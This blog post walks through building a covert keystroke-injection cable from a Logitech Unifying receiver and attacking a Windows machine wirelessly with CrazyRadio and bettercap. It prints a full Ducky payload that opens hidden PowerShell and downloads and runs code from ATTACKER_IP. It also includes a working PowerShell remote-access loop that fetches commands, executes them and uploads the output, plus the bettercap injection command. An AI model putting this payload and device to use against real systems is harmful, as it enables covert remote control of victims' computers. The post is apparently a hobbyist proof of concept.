Following what I mentioned in my previous post, I went to my electronics bin and gathered a Logitech Wireless mouse (M185) and a USB cable.
On the mouse, I took the receiver – a Logitech Unifying Receiver CU0010 (nRF24L family):
And cut one of the sides of a random USB cable:
Split the wires:
Removed the cap from the Logitech receiver:
Solder (really need to improve my soldering skills) the wires (GND, Data+, Data- and VCC) into the receiver:
Put the USB connector cap on:
Add a nice plastic USB enclosure to make it more real:
All the process was fast, I took around 5 minutes to cut, solder and super-glue all together. In the end I think it could be better, specially when I rammed the USB connector with a knife.
For the second part it took a little more because I wanted to use another alternative to the existing HID cables – so I went with CrazyRadio + Bastille firmware and a final touch of bettercap HID module to send my Ducky payload. I wanted to take advantage of what I had and that’s it.
This is basically a walkthrough of what I did:
- Write down the MAC address of the device (using HID.recon from bettercap or by checking the properties of the device – this will depend on your OS)
- Write your Ducky payload – in this PoC is just a reverse shell to my VPS
DELAY 750
GUI r
DELAY 500
STRING cmd
ENTER
DELAY 500
STRING powershell -NoP -NonI -Exec Bypass -W hidden "IEX (New-Object System.Net.WebClient).DownloadString('http://ATTACKER_IP/ps.txt')"
ENTER
DELAY 750
function getUser() {
$string = ([System.Security.Principal.WindowsIdentity]::GetCurrent().Name) | Out-String
$string = $string.Trim()
return $string
}
function getComputerName() {
$string = (Get-WmiObject Win32_OperatingSystem).CSName | Out-String
$string = $string.Trim()
return $string
}
$resp = "http://ATTACKER_IP:8000/rat"
$w = New-Object Net.WebClient
while($true) {
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
$r_get = $w.DownloadString($resp)
$d = [System.Convert]::FromBase64String($r_get);
$Ds = [System.Text.Encoding]::UTF8.GetString($d);
while($r_get) {
$output = invoke-expression $Ds | out-string
$w.UploadString($resp, $output)
break
}
}
- Connect the HID cable on the Windows victim machine (don’t forget that the payload will be OS dependable)
- Start your listener on the attacker machine
- Connect CrazyRadio and start bettercap
bettercap -eval="hid.recon on" hid.inject MAC PT ducky.txt
And its basically game-over.
I did a short video to illustrate the PoC – https://www.youtube.com/watch?v=y9C-4bcgmIU.
In the process of creating this HID cable with “leftovers” I learn a few things:
- Some Logitech Unifying receivers are not vulnerable to some known attacks – like keystroke injection;
- Be careful when putting solder on the USB contacts. Just put a small amount and spread it slightly with your iron, that way the PCB will fit better on the USB connector;
- Do a first run on a USB hub just to make sure you don’t burn your laptop port or something;
- Don’t waste money buying expensive HID cables (specially when ripped from others) when you can make your own for less that $10;
- Last point, don’t keep your brain focused on doing what others do and don’t be afraid do fail at first. Be persistent and never quit.
